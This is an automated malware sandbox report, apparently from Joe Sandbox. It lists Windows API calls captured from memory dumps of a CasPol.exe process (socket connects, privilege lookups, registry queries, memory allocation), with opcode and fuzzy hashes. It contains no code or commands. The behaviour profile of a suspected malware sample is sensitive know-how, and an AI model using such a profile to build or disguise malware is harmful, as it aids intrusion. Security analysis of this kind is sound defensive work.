                                  • API String ID: 2506852604-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RasConnectionNotificationW.RASAPI32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1D63
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ConnectionNotification
                                  • String ID:
                                  • API String ID: 1402429939-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D5FA8E2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetNetworkParams.IPHLPAPI(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E25C4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: NetworkParams
                                  • String ID:
                                  • API String ID: 2134775280-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetFileType.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E0995
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 010E2B06
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Connect
                                  • String ID:
                                  • API String ID: 3144859779-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D5FAF82
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: BaseModuleName
                                  • String ID:
                                  • API String ID: 595626670-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CertGetCertificateChain.CRYPT32(?,00000EA4,?,?), ref: 010E1BCE
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChain
                                  • String ID:
                                  • API String ID: 3019455780-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTempFileNameW.KERNEL32(?,00000EA4,?,?), ref: 010E2476
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileNameTemp
                                  • String ID:
                                  • API String ID: 745986568-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010E4C4E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,C151FFB0,00000000,?,?,?,?), ref: 1D5FB0F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: AllocNumaVirtual
                                  • String ID:
                                  • API String ID: 4233825816-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FindWindow
                                  • String ID:
                                  • API String ID: 134000473-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FA378
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D5FB612
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: DisplayNameParse
                                  • String ID:
                                  • API String ID: 3580041360-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D5FA7BE
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FABB8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 010E45F2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Enum
                                  • String ID:
                                  • API String ID: 2928410991-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 010E0E8C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID:
                                  • API String ID: 3981526788-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 010E4874
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RasEnumConnectionsW.RASAPI32(?,00000EA4,?,?), ref: 010E0CDA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ConnectionsEnum
                                  • String ID:
                                  • API String ID: 3832085198-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Initialize
                                  • String ID:
                                  • API String ID: 2538663250-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FA4E8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Sleep.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FB1A4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Sleep.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FB1A4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd20efc18776dbb72b1528d18b65b718eb48aeca2a2a05c88ee79c1dfd6a0cf1
                                  • Instruction ID: 798a4c70a3a96f633fbcb53d928e927e5ba929e3f57d5dda0b97127e395c015a
                                  • Opcode Fuzzy Hash: dd20efc18776dbb72b1528d18b65b718eb48aeca2a2a05c88ee79c1dfd6a0cf1
                                  • Instruction Fuzzy Hash: 4F721974E002298FCB65DF24C894B9DBBF5AF84344F0486D9D509AB345DB74AEC28F86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08f263891374986c64900d610230dbaae8506314b4dca359632dbf4f98b0a52b
                                  • Instruction ID: 94868b265c283c9a0f9acd76ac8ea7d4a8110fd1010dcccb0a326734f02f000b
                                  • Opcode Fuzzy Hash: 08f263891374986c64900d610230dbaae8506314b4dca359632dbf4f98b0a52b
                                  • Instruction Fuzzy Hash: 80F17E30B042059FDB04DBB8C4A4BADB7F6BF84354F258569E505DB3A6EB38DD028B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb1dae9e6de9eb5ab2fdbf5c91e2f6c08518da81dbfb25a497465a59ea8b2cd8
                                  • Instruction ID: 66136b553521090b64bde83ee13b4be616008cbc6100729260926a99279b1b69
                                  • Opcode Fuzzy Hash: fb1dae9e6de9eb5ab2fdbf5c91e2f6c08518da81dbfb25a497465a59ea8b2cd8
                                  • Instruction Fuzzy Hash: A632D154E482818DE72692A8459474C3FA29B9F318F9EC3D7C0A58F6F7C77C89878352
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb61bb64d4b741aae06e0d4effbe344792085b530a8dcc79dcef74a64da821f7
                                  • Instruction ID: 39711ba3b389ff71ac63c9e0ece3709b98e538c45ead873e23f2d16793ce6ce0
                                  • Opcode Fuzzy Hash: eb61bb64d4b741aae06e0d4effbe344792085b530a8dcc79dcef74a64da821f7
                                  • Instruction Fuzzy Hash: 5BF16170B002149FCB04EBB9C49476EBBF6AF88354F158569E506DB395EF38DD028B92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ea48e20460f4676437c526afe2def7342f3800e8626c9314686ee058454f4d7
                                  • Instruction ID: e90c50de725452acc1d94520aac0ed3cb624771e0ab723f41c855570f1fcbb9d
                                  • Opcode Fuzzy Hash: 0ea48e20460f4676437c526afe2def7342f3800e8626c9314686ee058454f4d7
                                  • Instruction Fuzzy Hash: C1322474A152298FCB61DF28C988A99BBF5FB48324F14C1DAE80DA3754EB315E91DF01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 735bd95553abbda6d798a1208dce34bf4cec215ebd4fdf99b005f61f287e5932
                                  • Instruction ID: 46111b81331d77158cd6f9175e6679e0c10d7f23afe895766d087b7fd6ee0010
                                  • Opcode Fuzzy Hash: 735bd95553abbda6d798a1208dce34bf4cec215ebd4fdf99b005f61f287e5932
                                  • Instruction Fuzzy Hash: 9C222474A152298FCB61DF28C988A99BBF5FB48324F14C1DAE80DA3754EB315E91DF01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff343ee6e2c0804cf673dc648cbd31e08f850e913a83423a301864322453fa76
                                  • Instruction ID: 423cc73b83d9def371c46f1ec5c5a91157c66c25b5c703b586e7e7ec91edb02b
                                  • Opcode Fuzzy Hash: ff343ee6e2c0804cf673dc648cbd31e08f850e913a83423a301864322453fa76
                                  • Instruction Fuzzy Hash: 52D15A74E002098FEB14DBA8C484B9DB7F1EB49314F62C526E915EB366DB38DD81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98e373f45191a056cecdfa58f8bdf5dfa10339ad4bed5589815a5f501b5a167d
                                  • Instruction ID: 69f23d56eb581db238db5637e403da9d783aae012077ff248aa1f3d87de933f2
                                  • Opcode Fuzzy Hash: 98e373f45191a056cecdfa58f8bdf5dfa10339ad4bed5589815a5f501b5a167d
                                  • Instruction Fuzzy Hash: A0022574A152298FDB61DF28C988A98BBF5FB48324F1481D9E80DA3754EB315F91DF01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d8489e7c94500c088acbc691ca264d0cef087d8a50a075947e6d15eb3238c53
                                  • Instruction ID: 5560c1930f2a9f8b8679a2271295e0764651c353b6c3115a6c3da5fdfbdae6f7
                                  • Opcode Fuzzy Hash: 7d8489e7c94500c088acbc691ca264d0cef087d8a50a075947e6d15eb3238c53
                                  • Instruction Fuzzy Hash: EFC1DFB4F002558FD705AB78C454BAE7BB6AF89304F24446ED446DB3D1DA34E881CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce132b28db441d9f31d16a24a6238aae803f91e6b679b7a987f14c561d933e57
                                  • Instruction ID: 19a928bfc8f5f2482f744bacfb2b2cdfe742f74083979aef295537bfd00ee436
                                  • Opcode Fuzzy Hash: ce132b28db441d9f31d16a24a6238aae803f91e6b679b7a987f14c561d933e57
                                  • Instruction Fuzzy Hash: 17D15B74E002098FDB10DBA8C484B9DB7F1EB49314F26C526E915EB366D738DD81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b35ab7d00d25f216776d77e8aa752e192afd1fb8deb7f786599862457466c272
                                  • Instruction ID: 28b7870d24c17e894737cec7ccdb16c4a499f317deaf412c13d33c49e63e6028
                                  • Opcode Fuzzy Hash: b35ab7d00d25f216776d77e8aa752e192afd1fb8deb7f786599862457466c272
                                  • Instruction Fuzzy Hash: 0FA14935E002199BDB18EBB9C45069EB7F6AF88344F65852CD405EB395EF79DC02CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee1f6530034b8663f516b4e71bc0e1032c01b4356a9197948472d43b06215ee7
                                  • Instruction ID: bb3cf801a3a2d34c68509f7348bead44d849478132dd20547992632f6fefdc26
                                  • Opcode Fuzzy Hash: ee1f6530034b8663f516b4e71bc0e1032c01b4356a9197948472d43b06215ee7
                                  • Instruction Fuzzy Hash: 13B16C30B002259FDB44EBB4C898B5DB7F6AF88364F15C628E115DB2E5DF39D8418B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb23dc498bfa1047161a358d095dbc2b7dd67c4b5c572e603daf423aec9a89f4
                                  • Instruction ID: b37b495bcb249a6704dbe132f546b25e19d36ce0e8546f7b85face67c23b51e8
                                  • Opcode Fuzzy Hash: cb23dc498bfa1047161a358d095dbc2b7dd67c4b5c572e603daf423aec9a89f4
                                  • Instruction Fuzzy Hash: 3F912970F002089BDB14DBF8C894B9DBBF2AF85364F15C529E509DB3A6DB38E8418B51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0364663e6be170d93d7a49bfdef19a763bc777a70c166a770b357c2b32591e7d
                                  • Instruction ID: e9cf1b78e0ec7cdd16f7ce875e22a4774e8f73a2f379d50e319517111f825148
                                  • Opcode Fuzzy Hash: 0364663e6be170d93d7a49bfdef19a763bc777a70c166a770b357c2b32591e7d
                                  • Instruction Fuzzy Hash: 4F91F475E452449FDB05CBF8C890BDEBBF1AF89300F15846AD105EB2A1DA349D09CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6848f49508cf205cf09ca2cecf295c683913b8ad28f42a7349ab37f6dd49e5fb
                                  • Instruction ID: 1244cdb5cffe5a5fcac899d5b588e627ccd1293a35490f46754e580ec953be61
                                  • Opcode Fuzzy Hash: 6848f49508cf205cf09ca2cecf295c683913b8ad28f42a7349ab37f6dd49e5fb
                                  • Instruction Fuzzy Hash: 51912970F002049BDB14DBB8C894B9DBBF2AF86324F15C559E505DB3A6DA38E8518B51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d15706c3ac4c24b66fc8fc674e25aedd0e50e155a8b99206282d46d70f553640
                                  • Instruction ID: ef66dddb54f11f76bc1a78a7691bb268e67d758d01af31cca8b288825622b255
                                  • Opcode Fuzzy Hash: d15706c3ac4c24b66fc8fc674e25aedd0e50e155a8b99206282d46d70f553640
                                  • Instruction Fuzzy Hash: 7A81D271F002159FDB09DBB8C890AAEBBF2AFC8250F15802DD506EB390DE349D05CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
